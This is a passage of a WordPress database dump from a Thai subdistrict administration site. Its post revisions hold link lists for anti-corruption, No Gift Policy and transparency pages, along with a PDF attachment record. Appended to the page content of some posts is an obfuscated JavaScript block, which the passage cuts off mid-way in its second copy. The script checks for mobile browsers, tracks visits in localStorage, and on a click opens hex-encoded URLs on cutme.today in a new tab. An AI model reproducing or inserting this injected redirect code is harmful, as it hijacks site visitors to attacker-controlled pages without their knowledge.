kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_22db24-50\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_22db24-50\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_39740e-99\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_39740e-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_98736b-ac\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_98736b-ac\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_61f4d2-80\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_61f4d2-80\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_67b463-61\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_67b463-61\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\" data-type=\"page\" data-id=\"1032\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9c9020-fa\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9c9020-fa\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1020\" data-type=\"page\" data-id=\"1020\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แผนการปฏิบัติการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1016\" data-type=\"page\" data-id=\"1016\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_f729cb-3e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_f729cb-3e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1036\" data-type=\"page\" data-id=\"1036\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_893939-da\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_893939-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1052\" data-type=\"page\" data-id=\"1052\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-09-01 20:44:41','2024-09-01 13:44:41','',871,'http://pakhaeng.ssk.in.th/?p=1084',0,'revision','',0),
(1085,1,'2024-09-01 20:53:56','2024-09-01 13:53:56','','แผนปฏิบัติการประจำปีงบประมาณ 2567','','inherit','','closed','','%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%88%e0%b8%b3%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a','','','2024-09-01 20:53:56','2024-09-01 13:53:56','',824,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/แผนปฏิบัติการประจำปีงบประมาณ-2567.pdf',0,'attachment','application/pdf',0),
(1087,1,'2024-09-01 20:54:02','2024-09-01 13:54:02','<!-- wp:file {\"id\":1085,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/แผนปฏิบัติการประจำปีงบประมาณ-2567.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/แผนปฏิบัติการประจำปีงบประมาณ-2567.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"แผนปฏิบัติการประจำปีงบประมาณ 2567\"></object><a id=\"wp-block-file--media-f040587d-354c-4d31-9c66-b789810e9aef\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/แผนปฏิบัติการประจำปีงบประมาณ-2567.pdf\">แผนปฏิบัติการประจำปีงบประมาณ 2567</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/แผนปฏิบัติการประจำปีงบประมาณ-2567.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-f040587d-354c-4d31-9c66-b789810e9aef\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 